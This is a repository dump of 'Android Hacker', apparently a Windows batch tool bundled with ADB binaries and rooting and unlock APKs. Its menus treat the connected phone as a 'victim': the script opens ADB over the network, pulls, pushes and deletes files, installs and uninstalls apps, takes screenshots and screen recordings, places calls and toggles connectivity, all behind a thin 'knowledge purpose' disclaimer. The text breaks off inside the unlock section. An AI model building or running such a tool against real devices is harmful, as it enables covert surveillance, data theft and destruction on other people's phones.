├── .gitignore ├── AdbWinApi.dll ├── AdbWinUsbApi.dll ├── Android Hacker.bat ├── Android Hacker.txt ├── Android Hacker45654.exe ├── LICENSE ├── MAF32.exe ├── NOTICE.txt ├── README.md ├── _config.yml ├── adb.exe ├── apk ├── AntiGuard.txt ├── BusyBox Free_stericson.busybox.apk ├── Redmeapp-debug.txt ├── accesspoint.apk ├── kingroot-5-0-2.apk └── nonrootunlock.apk ├── dmtracedump.exe ├── etc1tool.exe ├── fastboot.exe ├── hprof-conv.exe ├── lib64 └── libc++.so ├── libwinpthread-1.dll ├── make_f2fs.exe ├── mke2fs.conf ├── mke2fs.exe ├── output.tmp ├── source.properties ├── sqlite3.exe ├── unins000.dat ├── unins000.exe ├── wireless.bat └── wireless.txt /.gitignore: -------------------------------------------------------------------------------- 1 | 2 | # Created by https://www.gitignore.io/api/batch,windows,android,executable 3 | 4 | ### Android ### 5 | # Built application files 6 | *.apk 7 | *.ap_ 8 | 9 | # Files for the ART/Dalvik VM 10 | *.dex 11 | 12 | # Java class files 13 | *.class 14 | 15 | # Generated files 16 | bin/ 17 | gen/ 18 | out/ 19 | 20 | # Gradle files 21 | .gradle/ 22 | build/ 23 | 24 | # Local configuration file (sdk path, etc) 25 | local.properties 26 | 27 | # Proguard folder generated by Eclipse 28 | proguard/ 29 | 30 | # Log Files 31 | *.log 32 | 33 | # Android Studio Navigation editor temp files 34 | .navigation/ 35 | 36 | # Android Studio captures folder 37 | captures/ 38 | 39 | # Intellij 40 | *.iml 41 | .idea/workspace.xml 42 | .idea/tasks.xml 43 | .idea/gradle.xml 44 | .idea/dictionaries 45 | .idea/libraries 46 | 47 | # Keystore files 48 | *.jks 49 | 50 | # External native build folder generated in Android Studio 2.2 and later 51 | .externalNativeBuild 52 | 53 | # Google Services (e.g. APIs or Firebase) 54 | google-services.json 55 | 56 | # Freeline 57 | freeline.py 58 | freeline/ 59 | freeline_project_description.json 60 | 61 | ### Android Patch ### 62 | gen-external-apklibs 63 | 64 | ### Batch ### 65 | # BatchFiles 66 | *.bat 67 | *.cmd 68 | *.btm 69 | 70 | ### Executable ### 71 | *.app 72 | *.cgi 73 | *.com 74 | *.exe 75 | *.gadget 76 | *.jar 77 | *.pif 78 | *.vb 79 | *.wsf 80 | 81 | ### Windows ### 82 | # Windows thumbnail cache files 83 | Thumbs.db 84 | ehthumbs.db 85 | ehthumbs_vista.db 86 | 87 | # Folder config file 88 | Desktop.ini 89 | 90 | # Recycle Bin used on file shares 91 | $RECYCLE.BIN/ 92 | 93 | # Windows Installer files 94 | *.cab 95 | *.msi 96 | *.msm 97 | *.msp 98 | 99 | # Windows shortcuts 100 | *.lnk 101 | 102 | # End of https://www.gitignore.io/api/batch,windows,android,executable 103 | -------------------------------------------------------------------------------- /AdbWinApi.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/prashantmi/Android-H/cf02ec65c182d564a4773d56d5e1bb6f1e33a58a/AdbWinApi.dll -------------------------------------------------------------------------------- /AdbWinUsbApi.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/prashantmi/Android-H/cf02ec65c182d564a4773d56d5e1bb6f1e33a58a/AdbWinUsbApi.dll -------------------------------------------------------------------------------- /Android Hacker.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | title Android Hacker 3 | rem CursorHide 4 | mode con:cols=110 lines=50 5 | ::rem ChangeColor %o1% %o2% 6 | color 0B 7 | :ano 8 | echo. 9 | echo ..:///+osssssssssso+//:.. 10 | echo .:/shdNNNNMMMMMMMMMMMMMMMMMMMMMNNNNmhy+/- 11 | echo -odNNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNmh+. 12 | echo :hNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNy 13 | echo :NMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMh 14 | echo :NMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMh 15 | echo dMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM- 16 | echo -NMMMMMMMMMMNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNNNNMMMMMMMMMy 17 | echo +MMMMMmho/:---:/oydNMMMMMMMMMMMMMMMMNmyo/--..-:+ymMMMMMN 18 | echo hMMMmo//so+/:. `./hNMMMMMMMMMMMdo-` `..-:/os+/+hMMMM. 19 | echo .NMMhsdNMMms+/-``--` -yMMMMMMMMm/` `-/--::/smMMMmhyNMMo 20 | echo .MMNmMMMMMMMMMNho.`-/. dMMMMMMM: .//-./hNMMMMMMMMMNmMMs 21 | echo :MMMMMMMMMMMMMMMMms-`://+NMMMMMMMy/+/..odMMMMMMMMMMMMMMMMs 22 | echo +MMMMMMMMMMMMMMMMMMNh- :dMMMMMMMMNy`.smMMMMMMMMMMMMMMMMMMh 23 | echo sMMMMMMNmhysoosyhmNMMm- `hMMMMMMMy.sNMMNmyso//+sshmMMMMMMM 24 | echo hMMMMNy:` `-odNm` .NMMMMMMmmMMds:` `/dMMMMM 25 | echo hMMdo: :m. hMMMMMMMMM/ `++hmN 26 | echo oMMh ``..---::::://+sdd. +MMMMMMMMMNo//+ooooo+/+oooyhhsoy 27 | echo hMMyhdNNMMMMMMMMMMMMMMm` oMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM 28 | echo +MMMMMMMMMMMMMMMMMMMMMd dMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM 29 | echo `dMMMMMMMMMMMMMMMMMMMM+ dMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMN 30 | echo /MMMMMMMMMMMMMMMMMMM- yMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM+ 31 | echo : yMMMMMMMMMMMMMMMMMy oMMMMMMMMMMMMMMMMMMMMMMMMMMMMm+ 32 | echo sy`.smMMMMMMMNNNMms/ dMMMMMMMmohNMMMMMMMMMMMMMMMd/: 33 | echo .mo ...-::://+sm. -: mMMMMMMMMms/NMMh++osssoo+/. /y 34 | echo -N: +: `hNNMMMMN. :No -MMMMMMMMMMModMMMNmmhy/ -/ .m- 35 | echo +N/`y- `oNMMMMMmodM+ +MMMMMMMMMMMNMMMMMMMNo /m:`dy 36 | echo oNo.o: .+hNMMMMMMN/ oMMMMMMhdMMMMMMMMMNy- /N+`ym` 37 | echo sMh.//` .-+yhdho` `:/ss/- `omMMMNdy+. od:`hN- 38 | echo oMd:.++-` `` -o- `....` `/yo`.dN: 39 | echo oNN/ .ohs/-` +mMNs. .:ohy/ -mm: 40 | echo +NNs` .smNmdys+++:++yss+.--///+sdmMMds.+Nd. 41 | echo \mMy` .ohmMMMMMNNNmmmmmNNMMMMMMMMMy.sNy` 42 | echo \dMh` odyyyhddmmmmmmmNNMMMMMMMMMs-dNo 43 | echo \hMh` yMMMNmdh/....`./hMMMMMMMNo+Nm/ 44 | echo \sNh`yMMMMMMMN. -mMMMMMMMNohNd- 45 | echo +Ns-MMMMMMMm. /MMMMMMMMdmMy` 46 | echo -yhMMMMMMN- `dMMMMMMMMN+` 47 | echo /mMMMMMd +MMMMMMMm- 48 | echo -dMMMMN` yMMMMMMy` 49 | echo .yNMMM+ .NMMMMd/ 50 | echo /hNMm` yMMNd/` 51 | echo -+o. os+- 52 | echo. 53 | echo. 54 | pause >nul 55 | cls 56 | color 8b 57 | echo. 58 | echo " ________ ________ ________ ________ ________ ___ ________ "; 59 | echo " |\ __ \|\ ___ \|\ ___ \|\ __ \|\ __ \|\ \|\ ___ \ "; 60 | echo " \ \ \|\ \ \ \\ \ \ \ \_|\ \ \ \|\ \ \ \|\ \ \ \ \ \_|\ \ "; 61 | echo " \ \ __ \ \ \\ \ \ \ \ \\ \ \ _ _\ \ \\\ \ \ \ \ \ \\ \ "; 62 | echo " \ \ \ \ \ \ \\ \ \ \ \_\\ \ \ \\ \\ \ \\\ \ \ \ \ \_\\ \ "; 63 | echo " \ \__\ \__\ \__\\ \__\ \_______\ \__\\ _\\ \_______\ \__\ \_______\ "; 64 | echo " \|__|\|__|\|__| \|__|\|_______|\|__|\|__|\|_______|\|__|\|_______| "; 65 | echo " "; 66 | echo " ___ ___ ________ ________ ___ __ _______ ________ "; 67 | echo " |\ \|\ \|\ __ \|\ ____\|\ \|\ \ |\ ___\ |\ __ \ "; 68 | echo " \ \ \\\ \ \ \|\ \ \ \___|\ \ \/ /|\ \ \__|_\ \ \|\ \ "; 69 | echo " \ \ __ \ \ __ \ \ \ \ \ ___ \ \ \___\\ \ _ _\ "; 70 | echo " \ \ \ \ \ \ \ \ \ \ \____\ \ \\ \ \ \ \__|_\ \ \\ \ "; 71 | echo " \ \__\ \__\ \__\ \__\ \_______\ \__\\ \__\ \______\\ \__\\ _\ "; 72 | echo " \|__|\|__|\|__|\|__|\|_______|\|__| \|__|\|______| \|__|\|__| "; 73 | echo " "; 74 | echo " ________ _______ ___ ___ _______ ___ ________ ________ _______ ________ "; 75 | echo " |\ ___ \|\ ___\ |\ \ / /|\ ___\ |\ \ |\ __ \|\ __ \|\ ___\ |\ __ \ "; 76 | echo " \ \ \_|\ \ \ \__|_\ \ \ / / | \ \__|_\ \ \ \ \ \|\ \ \ \|\ \ \ \__|_\ \ \|\ \ "; 77 | echo " \ \ \ \\ \ \ \___\\ \ \/ / / \ \ \___\\ \ \ \ \ \\\ \ \ ____\ \ \___\\ \ _ _\ "; 78 | echo " \ \ \_\\ \ \ \__|_\ \ / / \ \ \__|_\ \ \____\ \ \\\ \ \ \___|\ \ \__|_\ \ \\ \ "; 79 | echo " \ \_______\ \______\\ \__/ / \ \______\\ \_______\ \_______\ \__\ \ \______\\ \__\\ _\ "; 80 | echo " \|_______|\|______| \|__|/ \|______| \|_______|\|_______|\|__| \|______| \|__|\|__|"; 81 | echo " "; 82 | echo " ________ ________ ________ ________ ___ ___ ________ ________ _________ "; 83 | echo " |\ __ \|\ __ \|\ __ \|\ ____\|\ \|\ \|\ __ \|\ ___ \|\___ ___\ "; 84 | echo " \ \ \|\ \ \ \|\ \ \ \|\ \ \ \___| \ \\\ \ \ \|\ \ \ \\ \ \|___ \ \_| "; 85 | echo " \ \ ____\ \ _ _\ \ __ \ \_____ \ \ __ \ \ __ \ \ \\ \ \ \ \ \ "; 86 | echo " \ \ \___|\ \ \\ \\ \ \ \ \|____|\ \ \ \ \ \ \ \ \ \ \ \\ \ \ \ \ \ "; 87 | echo " \ \__\ \ \__\\ _\\ \__\ \__ ______\ \ \__\ \__\ \__\ \__\ \__\\ \__\ \ \__\ "; 88 | echo " \|__| \|__|\|__|\|__|\|__|\|_______|\|__|\|__|\|__|\|__|\|__| \|__| \|__| "; 89 | echo. 90 | pause >nul 91 | :: Android Hacker ;Author Prashant Mishra ;GitHub User :Prashant Mishra 92 | :: This Software Usess "ADB Commands" To Perform It's Task On Android Devices So Special Thanks To Google For Android Device, ADB, Developer Mode 93 | :: Before using this batch script you need Android SDK Or ADB Fastboot Tool For Your Convenience i have added ADB And Fastboot with package 94 | color 8b 95 | ::---------------------------------------------------------------------------------------------------------------Disclaimer 96 | cls 97 | echo. 98 | echo. 99 | echo. ________________________ 100 | echo. :Disclaimer: 101 | echo. __________________________ 102 | echo. 103 | echo. [_] This application Is Issued Only For knowledge Purpose Any Actions Or Activities 104 | echo. Related To This application/script Is Solely Final User's Responsibility, The Misuse Of This 105 | echo. Code Can Result In Criminal Charges Brought Against The Persons In Question. 106 | echo. The Author/Developer Will Not Be Held Responsible In The Event Any Criminal Charges Be 107 | echo. Brought Against Any Individuals Misusing This Code To Break The Law. 108 | echo. 109 | echo. [_] Usage of Android-H to compromise any device/emulator without prior mutual consistency can 110 | echo. be considered as an illegal activity. It is the final user's responsibility to obey all 111 | echo. applicable local, state and federal laws. Authors/Developer assume no liability and are not 112 | echo. responsible for any misuse or damage caused by this program. 113 | echo. 114 | echo. [_] If You Fully Understand And Except This Disclaimer Then Only Hit Enter Or CLOSE NOW! 115 | echo. 116 | echo. 117 | echo. 118 | echo **** Don Not make Changes To Package Otherwise Software Won't Work **** 119 | echo. 120 | echo. 121 | echo. 122 | echo. 123 | echo ___________To Except The Disclaimer And Continue Hit Any Key___________ 124 | pause >nul 125 | echo. 126 | echo. 127 | ::------------------------------------------------------------------------------------------------------Disclaimer/Main Menu 128 | :menu1 129 | cd %MYFILES% 130 | mode con:cols=108 lines=50 131 | cls 132 | echo. 133 | echo. 134 | echo ---------------------------- 135 | echo Main Menu 136 | echo ---------------------------- 137 | echo. 138 | echo [1] Scan Connected Victims 139 | echo. 140 | echo [2] Wired Connection (Android Over USB). 141 | echo. 142 | echo [3] Wireless Connection (Android Over Lan). 143 | echo. 144 | echo [4] Goto Menu 2 (If Connection Setup Already Done) 145 | echo. 146 | echo [5] Exit 147 | echo. 148 | rem CursorShow 149 | set input="" 150 | set /p input= [-] Select an option number From Above: 151 | if %input%==1 goto adbdevices 152 | if %input%==2 goto wired 153 | if %input%==3 goto wireless 154 | if %input%==4 goto menu2 155 | if %input%==5 goto Exit 156 | echo. 157 | @echo Not a valid choice Try Again 158 | pause >nul 159 | goto menu1 160 | ::-------------------------------------------------------------------------------------------------------Main Menu/adbdevices 161 | :adbdevices 162 | cls 163 | adb devices -l | find "device product:" >nul 164 | if errorlevel 1 ( 165 | echo [ No Devices Connected ] 166 | ) else ( 167 | echo [ Victim's Device Connected ] 168 | ) 169 | echo. 170 | adb shell input keyevent 3 >nul 171 | pause 172 | goto menu1 173 | ::---------------------------------------------------------------------------------------------------------------adbdevices/wired 174 | :wired 175 | cls 176 | adb kill-server 177 | adb usb >nul 178 | timeout 5 >nul 179 | adb devices -l | find "device product:" >nul 180 | if errorlevel 1 ( 181 | echo. 182 | echo [ No Devices Connected ] 183 | echo [-] Press Any Key To Back To Previous Menu ] 184 | echo. 185 | pause >nul 186 | goto menu1 187 | ) else ( 188 | echo [ Victim's Device Connected ] 189 | ) 190 | pause 191 | goto menu2 192 | ::----------------------------------------------------------------------------------------------------------------wired/wifi 193 | :wireless 194 | cls 195 | echo. 196 | echo. 197 | echo ---------------------------- 198 | echo Wireless 199 | echo ---------------------------- 200 | echo. 201 | echo [1] Turn WiFi On. 202 | echo. 203 | echo [2] Connect To Local Access Point. 204 | echo. 205 | echo [3] Turn Wireless Port On. 206 | echo. 207 | echo [4] Wireless Connection (Android Over Lan). 208 | echo. 209 | echo [5] Goto Menu 2 (If Connection Setup Already Done) 210 | echo. 211 | echo [6] Goto Back To Previous Menu 212 | echo. 213 | rem CursorShow 214 | set input="" 215 | set /p input= [-] Select an option number From Above: 216 | 217 | if %input%==1 goto wifi 218 | if %input%==2 goto inag 219 | if %input%==3 goto adbport 220 | if %input%==4 goto getip 221 | if %input%==5 goto menu2 222 | if %input%==6 goto menu1 223 | echo. 224 | @echo Not a valid choice Try Again 225 | pause >nul 226 | goto menu1 227 | ::-------------------------------------------------------------------------------------------------------------------- 228 | :wifi 229 | echo Turning On Wifi If Already Not Enabled.. "If There Is No Error Or Message" Enjoy Your Wifi Is ON 230 | adb shell svc wifi enable 231 | echo. 232 | pause 233 | goto wireless 234 | ::--------------------------------------------------------------------------------------------------------------------- 235 | :inag 236 | adb install -l "%cd%/apk/accesspoint.apk" 237 | :tiadb 238 | set /p ssid=[-] Please Enter WiFi Name : 239 | set /p pase=[-] Please Enter Wifi Password Encription Type : 240 | set /p wpass=[-] Please Enter WiFi Password : 241 | :startadb 242 | adb shell am start -n com.steinwurf.adbjoinwifi/com.steinwurf.adbjoinwifi.MainActivity -e ssid %ssid% -e password_type %pase% -e password %wpass% 243 | echo. 244 | pause 245 | goto Wireless 246 | 247 | ::------------------------------------------------------------------------------------------------------inag/adbport 248 | :adbport 249 | adb kill-server 250 | adb tcpip 5555 251 | adb devices 252 | echo. 253 | pause 254 | goto wireless 255 | ::------------------------------------------------------------------------------------------------------adbport/getip 256 | :getip 257 | cls 258 | adb shell svc wifi enable 259 | echo. 260 | echo __________________ 261 | echo ______ NOTE ______ 262 | echo. 263 | echo [ Please Fallow These Steps Before Connecting To Any Android Device(Victim) Wirelessly. ] 264 | echo. 265 | echo [1] Please Make Sure That The Android Devices(Victim) You Want To Connect And Machine(Attacker) 266 | echo On Which The Software Is Running Are On The Same Wireless Network. 267 | echo. 268 | echo [2] The Device You Want To Connect Should Have Wireless Port "5555" Enabled If Not Then Connect 269 | echo Victim's Device And Attacker Machine With A USB Cable And Go Back To Previous Menu 270 | echo And Select "Option:- 4.Start Wireless Adbport" 271 | echo. 272 | echo [3] Enter Local Ip Address Of the vitim's Device You Want To Connect if you don't know Victim's IP 273 | echo Connect Through USB To Get IP Address or Download "NMAP" For Your Windows Machine And "Fing" For 274 | echo Your Android Devices To Find IP Address Of all the devices in your Network 275 | echo. 276 | adb shell ip -f inet addr show wlan0 277 | timeout 2 >nul 278 | echo. 279 | echo If You Have Performed Every Step Correctly Your Victim's Device Local IP Will Be Displayed Above. 280 | echo Please Enter "Victim's IP Mentioned Above" After "inet" and Before "/" For Example If The IP Diplayed 281 | echo In This Format .."inet 192.168.10.103/24".. You Only Need To Copy 192.168.10.103 282 | echo. 283 | :inip 284 | echo __________ Press "e" To Go Back __________ 285 | echo. 286 | set ip="" 287 | set /p ip=[-] Please Enter IP Address : 288 | echo. 289 | if %ip%==e goto menu1 290 | if %ip%=="" echo Please Enter Correct Ip & pause >nul & cls & goto inip 291 | goto ipconnect 292 | ::--------------------------------------------------------------------------------------------------------------getip/ipconnect 293 | :ipconnect 294 | setlocal 295 | adb kill-server 296 | ::connected 297 | >output.tmp adb connect %ip%:5555 298 | ::nul 304 | ::echo %line1% | find/i /i "connected to" >nul 305 | if errorlevel 1 ( 306 | goto m2 307 | ) else ( 308 | cls 309 | echo. & echo Android Hacker Is connected With The Victim's Device Wirelessly. 310 | echo Now You Can Remove The USB & echo. 311 | echo Press Any Key To Continue To Menu 2 312 | pause >nul ) 313 | goto wireless 314 | :m2 315 | ::laptop wifi off 316 | echo %line1% | find/i "unreachable network" >nul 317 | if errorlevel 1 ( 318 | goto m3 ) 319 | else( 320 | echo. & echo laptop/Desktop Wifi IS Off Or Not connected To Local Wifi/LAN 321 | echo. & echo connect laptop/Desktop To The LAN. & echo. & pause >nul 322 | echo Press Any Key To Go Back 323 | goto getip 324 | ) 325 | :m3 326 | :: Wrong Ip format 327 | echo %line1% | find/i "no such host" >nul 328 | if errorlevel 1 ( 329 | goto m4 ) 330 | else( 331 | echo. & echo Wrong Format IP Address... 332 | echo. & echo Please Enter IP In Given Format Example "192.168.10.10" 333 | echo. & echo Press Any Key To Continue....& pause >nul 334 | goto getip 335 | ) 336 | :m4 337 | ::5555 port off 338 | echo %line1% | find/i "refused it" >nul 339 | if errorlevel 1 ( 340 | goto m5 ) 341 | else( 342 | echo. & echo Android Wifi is off or 343 | echo. & echo Android Wireless Port Is Off 344 | echo. & echo Press Any Key To Turn On & pause >nul 345 | 346 | goto adbport 347 | ) 348 | :m5 349 | :: Android Wifi Off 350 | echo %line1% | find/i "faild to respond" >nul 351 | if errorlevel 1 ( 352 | goto m6 ) 353 | else ( 354 | echo. & echo Could Not connect To Given IP 355 | echo. & echo Reason Can Be... 356 | echo. & echo Android Is Not connected To Local Wifi 357 | echo. & echo Or No Device With This Ip In LAN & pause >nul 358 | goto getip 359 | ) 360 | :m6 361 | echo. 362 | echo Unknown Error & pause >nul 363 | goto getip 364 | pause >nul 365 | 366 | 367 | ::-------------------------------------------------------------------------------------------------------------menu 1 adbport/menu2 368 | :menu2 369 | cls 370 | echo ---------------------------- 371 | echo Menu 2 372 | echo ---------------------------- 373 | echo. 374 | adb devices -l | find "device product:" >nul 375 | if errorlevel 1 ( 376 | echo No Devices Connected "Press 4" To Back To Previous Menu 377 | ) else ( 378 | echo Victim's Device Connected 379 | ) 380 | adb shell input keyevent 3 >nul 381 | echo. 382 | echo [1] Actions For " Non Root " Android Victims. 383 | echo. 384 | echo [2] Special Action For " Root/Superuser " Android Victims. 385 | echo. 386 | echo [3] Enter Your Own Commands. 387 | echo. 388 | echo [4] Go Back To Main Menu 389 | ::----------------------------------------------------------------------------------------------------- 390 | echo. 391 | set input="" 392 | set /p input= [-] Select an option number above: 393 | if %input%==1 goto menu3 394 | if %input%==2 goto menu4 395 | if %input%==3 goto enterc 396 | if %input%==4 goto menu1 397 | rem CursorHide 398 | echo. 399 | @REM Invalid Choice Message 400 | @echo Not a valid choice Try Again 401 | pause >nul 402 | goto menu 2 403 | ::------------------------------------------------------------------------------------------------------menu2/menu3 404 | :menu3 405 | cls 406 | echo. 407 | echo ---------------------------- 408 | echo Menu 3 409 | echo ---------------------------- 410 | echo. 411 | adb devices -l | find "device product:" >nul 412 | if errorlevel 1 ( 413 | echo [ No Devices Connected "Press 14" To Back To Previous Menu ] 414 | ) else ( 415 | echo [ Victim's Device Connected ] 416 | ) 417 | echo. 418 | echo [1] List Base Files And Directories 419 | echo. 420 | echo [2] Extract Data From Victim's Device 421 | echo [3] Upload Data To Victim's Devices 422 | echo [4] Delete Data From Victim's Devices 423 | echo. 424 | echo [5] Application Manager 425 | echo. 426 | echo [6] Spy On Victim's Device Screen (ScreenShot) 427 | echo [7] Spy On Victim's Device Screen (Screen Recording) 428 | echo. 429 | echo [8] **** Make Call From Victim's Device **** 430 | echo. 431 | echo [9] Turn On WiFi 432 | echo [10] Turn Off WiFi 433 | echo. 434 | echo [11] Turn On Internet 435 | echo [12] Turn Off Internet 436 | echo. 437 | echo [13] Turn On Flight Mode 438 | echo [14] Turn Of Flight Mobe 439 | echo. 440 | echo [15] Enter ADB Shell Command 441 | echo. 442 | echo [16] Unlock Device 443 | echo. 444 | echo [17] Go Back To Previous Menu(Menu1) 445 | 446 | ::-------------------------------------------------------------------------------------------------------- 447 | echo. 448 | set input="" 449 | set /p input= [-] Select an option number above: 450 | if %input%==1 goto basels 451 | if %input%==2 goto adbpull 452 | if %input%==3 goto getpath2 453 | if %input%==4 goto adbdel 454 | if %input%==5 goto appman 455 | if %input%==6 goto screencap 456 | if %input%==7 goto screenreco 457 | if %input%==8 goto call 458 | if %input%==9 adb shell svc wifi enable & pause & goto menu3 459 | if %input%==10 adb shell svc wifi disable & pause & goto menu3 460 | if %input%==11 adb shell svc data enable & pause & goto menu3 461 | if %input%==12 adb shell svc data disable & pause & goto menu3 462 | if %input%==13 adb shell settings put global airplane_mode_on 1 & pause & goto menu3 463 | if %input%==14 adb shell settings put global airplane_mode_on 0 & pause & goto menu3 464 | if %input%==15 goto enterc 465 | if %input%==16 goto munlock 466 | if %input%==17 goto menu1 467 | 468 | rem CursorHide 469 | echo. 470 | @REM Invalid Choice Message 471 | @echo Not a valid choice Try Again 472 | pause >nul 473 | goto menu3 474 | ::--------------------------------------------------------------------------------------------------------- 475 | :basels 476 | cls 477 | echo. 478 | echo List Of Files And Directories Of Base Folder " / ". 479 | echo. 480 | adb shell ls 481 | echo. 482 | echo Walk The Tree And Navigate Through Directories, Type "cd Directory Name" To Enter Any Directory 483 | echo And "cd -" To Go Back To Previous Directory, 484 | echo Type "Exit" Or Press "ctrl+D" Any Time To EXit Directory View. 485 | echo. 486 | rem CursorShow 487 | adb shell 488 | goto menu3 489 | ::----------------------------------------------------------------------------------------------------------- 490 | :adbpull 491 | rem CursorShow 492 | echo. 493 | echo Enter Complete Path With Name And Extention Of Data 494 | echo Which Has To Be Downloaded From Victim's Device: 495 | set vsource1="" 496 | set /p vsource1=[ 497 | md Androiddata 498 | adb pull /%vsource1% %cd%\Androiddata 499 | pause 500 | goto menu3 501 | ::----------------------------------------------------------------------------------------------------------- 502 | :getpath2 503 | echo. 504 | echo Choose File To Uploaded To Victim's Device: 505 | set hsource1="" 506 | set result="" 507 | rem BrowseFiles 508 | set /p hsource1=%result% 509 | if exist "%hsource1%" goto destination 510 | ::========================================================= 511 | ::getpath2 512 | ::rem BrowseFiles 513 | ::echo Enter Complete Path With Name And Extention Of Data 514 | ::echo To Uploaded To Victim's Device: 515 | ::set hsource1="" 516 | ::set /p hsource1=[ 517 | ::goto destination 518 | ::--------------------------------------------------------- 519 | :destination 520 | echo. 521 | rem CursorShow 522 | echo Enter Complete Path Of Victim's Device Where Data Has To Be Uploaded: 523 | set /p vdestinpath1=[ 524 | goto push 525 | ::----------------------------------------------------------------------------------------------------------------- 526 | :push 527 | adb push %hsource1% /%vdestinpath1%/ 528 | pause 529 | goto menu3 530 | ::------------------------------------------------------------------------------------------------------------------ 531 | :adbdel 532 | rem CursorShow 533 | echo. 534 | echo Enter Complete Path With Name And Extention Of Data 535 | echo To Be Deleted From Victim's Device: 536 | set vsource2="" 537 | set /p vsource2=[ 538 | adb shell rm -r %vsource2% 539 | pause 540 | goto menu3 541 | ::--------------------------------------------------------------------------------------------------------------- 542 | :appman 543 | cls 544 | echo. 545 | echo ---------------------------- 546 | echo Applicatin/Package Manager 547 | echo ---------------------------- 548 | echo. 549 | adb devices -l | find "device product:" >nul 550 | if errorlevel 1 ( 551 | echo [ No Devices Connected "Press 14" To Back To Previous Menu ] 552 | ) else ( 553 | echo [ Victim's Device Connected ] 554 | ) 555 | echo. 556 | echo [1] List Of All Application 557 | echo [2] List Of System Application 558 | echo [3] List Of Third-Party Application 559 | echo [4] Install Application On Victims Device 560 | echo [5] Uninstall Application From Victims Device 561 | echo [6] Previouse Menu 562 | echo. 563 | set input="" 564 | set /p input= [-] Select an option number above: 565 | if %input%==1 cls & adb shell pm list packages & pause & goto appman 566 | if %input%==2 cls & adb shell pm list packages -s & pause & goto appman 567 | if %input%==3 cls & adb shell pm list packages -3 & pause & goto appman 568 | if %input%==4 goto insapp 569 | if %input%==5 goto unsapp 570 | if %input%==6 goto menu3 571 | echo. 572 | @echo Not a valid choice Try Again 573 | pause >nul 574 | goto appman 575 | ::---------------------------------------------------------------------------------------------------------------- 576 | :insapp 577 | cls 578 | echo. 579 | echo Please Enter Full Path Of The .apk With Name And Extention File Which Is To Be Installed 580 | echo. 581 | set apkins="" 582 | set /p apkins=[ 583 | echo. 584 | adb install -r %apkins% 585 | pause 586 | goto appman 587 | ::-------------------------------------------------------------------------------------------------------------- 588 | :unsapp 589 | cls 590 | echo. 591 | adb shell pm list packages -3 592 | echo. 593 | echo Please Enter Correct Name Of Application From Above List To Uninstall 594 | echo For Example "com.application" 595 | echo. 596 | set apkuns="" 597 | set /p apkuns=[ 598 | echo. 599 | adb uninstall %apkuns% 600 | pause 601 | goto appman 602 | ::------------------------------------------------------------------------------------------------------------menu3 appmanager/ScreenShot 603 | :screencap 604 | cls 605 | echo. 606 | adb devices -l | find "device product:" >nul 607 | if errorlevel 1 ( 608 | echo [ No Devices Connected Press Any Key To Back To Previous Menu ] 609 | echo. 610 | pause >nul 611 | goto menu3 612 | ) else ( 613 | echo [ Victim's Device Connected ] 614 | ) 615 | echo. 616 | echo Android Hacker Performing ScreeenShot...... 617 | echo ScreeenShot Will Be Saved In Victim's Device /sdcard/reco And Will Be Extracted. 618 | adb -d shell mkdir /sdcard/reco 619 | adb shell screencap /sdcard/reco/screen.png 620 | echo. 621 | md Androiddata 622 | adb -d pull /sdcard/reco %cd%\Androiddata 623 | pause 624 | goto menu3 625 | ::---------------------------------------------------------------------------------------------------------ScreenShot/screenrecord 626 | :screenreco 627 | cls 628 | echo. 629 | adb devices -l | find "device product:" >nul 630 | if errorlevel 1 ( 631 | echo [ No Devices Connected Press Any Key To Back To Previous Menu ] 632 | echo. 633 | pause >nul 634 | goto menu3 635 | ) else ( 636 | echo [ Victim's Device Connected ] 637 | ) 638 | echo. 639 | echo Android Hacker Is Performing Screen Recording....... 640 | echo Recorded MP4 Will Be Saved In Victim's Device /sdcard/reco And Will Be Extracted As Recording Stops. 641 | echo To Stop Recording Any Time Press Ctrl+C Otherwise Maximum Recording Time Is Set To 30 Minutes. 642 | echo Every 3 Minutes Screen Recording Will Be Stoped By The Device And Again Started By Android Hacker. 643 | echo. 644 | adb -d shell mkdir /sdcard/reco 645 | adb -d shell screenrecord --verbose /sdcard/reco/reco1.mp4 646 | adb -d shell screenrecord --verbose /sdcard/reco/reco2.mp4 647 | adb -d shell screenrecord --verbose /sdcard/reco/reco3.mp4 648 | adb -d shell screenrecord --verbose /sdcard/reco/reco4.mp4 649 | adb -d shell screenrecord --verbose /sdcard/reco/reco5.mp4 650 | adb -d shell screenrecord --verbose /sdcard/reco/reco6.mp4 651 | adb -d shell screenrecord --verbose /sdcard/reco/reco7.mp4 652 | adb -d shell screenrecord --verbose /sdcard/reco/reco8.mp4 653 | adb -d shell screenrecord --verbose /sdcard/reco/reco9.mp4 654 | adb -d shell screenrecord --verbose /sdcard/reco/reco10.mp4 655 | goto pullreco 656 | ::------------------------------------------------------------------------------------- 657 | :pullreco 658 | echo. 659 | echo Extracting Screen Recording .mp4 From vitim's Device. 660 | echo. 661 | md Androiddata 662 | adb -d pull /sdcard/reco %cd%\Androiddata 663 | pause 664 | goto menu3 665 | ::------------------------------------------------------------------------------------------------------------screenrecord/calling 666 | :call 667 | cls 668 | echo. 669 | echo Please Enter The Phone Number On Which You Want To Call From Victim's 670 | echo. 671 | set callno="" 672 | set /p callno=[ 673 | echo. 674 | adb shell am start -a android.intent.action.CALL tel:%callno% 675 | echo. 676 | pause 677 | goto menu3 678 | 679 | ::--------------------------------------------------------------------------------------------------------------calling/enterown command 680 | rem CursorShow 681 | :enterc 682 | adb shell 683 | pause 684 | goto menu3 685 | ::---------------------------------------------------------------------------------------------------enterown command/munlock 686 | :munlock 687 | cls 688 | echo. 689 | echo ---------------------------- 690 | echo Unlock/Type Message 691 | echo ---------------------------- 692 | echo. 693 | adb devices -l | find "device product:" >nul 694 | if errorlevel 1 ( 695 | echo [ No 